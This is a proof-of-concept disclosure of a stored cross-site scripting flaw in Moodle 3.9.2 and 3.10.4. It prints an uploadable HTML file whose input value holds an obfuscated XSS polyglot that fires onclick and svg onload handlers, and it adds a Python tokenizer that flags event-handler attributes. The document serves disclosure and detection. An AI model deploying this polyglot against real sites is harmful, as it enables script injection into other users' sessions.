This PoC describes how to exploit an XSS on Moodle 3.9.2 and 3.10.4 with a polyglot payload.
When creating a course, you can upload HTML files as a resource. When an uploaded HTML file contains an <input>
tag whose "value" attribute holds an XSS polyglot payload, it is possible to perform Cross-Site Scripting.
Versions affected: tested on Moodle 3.9.2 and 3.10.4
CVE ID: 2021-3558
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>POC XSS Moodle</title>
</head>
<body>
<h1>POC XSS Moodle</h1>
<input type="text" value="
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"></input>
</body>
</html>
My PoC
On version 3.9.2
On version 3.10.4 (tested on https://sandbox.moodledemo.net/ as teacher, student and guest)
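How an HTML tokenizer reads the PoC's <input> element, as an added example that is not part of the original PoC: a simplified start-tag tokenizer that a reviewer could run over uploaded HTML resources to list event-handler attributes. The helper names start_tags and active_content are hypothetical, the SAFE control string is constructed, and the tokenizer is an assumption-level simplification of the HTML5 attribute states.

```python
import re

WS = " \t\n\r\f"
TAG_OPEN = re.compile(r"<([A-Za-z][^ \t\n\r\f/>]*)")

def start_tags(html):
    """Yield (tag, [(attr, value), ...]) per start tag; comments and raw text are not handled."""
    i, n = 0, len(html)
    while (m := TAG_OPEN.search(html, i)):
        tag, i, attrs = m.group(1).lower(), m.end(), []
        while i < n and html[i] != ">":
            if html[i] in WS + "/":              # separators between attributes
                i += 1
                continue
            j = i + 1                            # name: anything up to space, / > or =
            while j < n and html[j] not in WS + "/>=":
                j += 1
            attr, value, i = html[i:j].lower(), "", j
            while i < n and html[i] in WS:
                i += 1
            if i < n and html[i] == "=":
                i += 1
                while i < n and html[i] in WS:
                    i += 1
                if i < n and html[i] in "\"'":   # quoted value ends at the next same quote
                    end = html.find(html[i], i + 1)
                    end = n if end < 0 else end
                    value, i = html[i + 1:end], end + 1
                else:                            # unquoted value ends at space or '>'
                    j = i
                    while j < n and html[j] not in WS + ">":
                        j += 1
                    value, i = html[i:j], j
            attrs.append((attr, value))
        yield tag, attrs

def active_content(html):
    """Return (tag, attribute) pairs for event-handler (on*) attributes."""
    return [(tag, a) for tag, attrs in start_tags(html)
            for a, _ in attrs if a.startswith("on")]

# The <input> element from the PoC file above, unchanged.
POC = r'''<input type="text" value="
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
"></input>'''
# Constructed control: similar text that never leaves the quoted value.
SAFE = '<input type="text" value="oNcliCk=alert() &lt;sVg oNloAd=alert()&gt;">'

if __name__ == "__main__":
    print(active_content(POC), active_content(SAFE))
```

On the PoC element the value attribute ends at the first double quote inside the payload, so the check reports onclick on the input and onload on the following svg tag; the control string reports nothing.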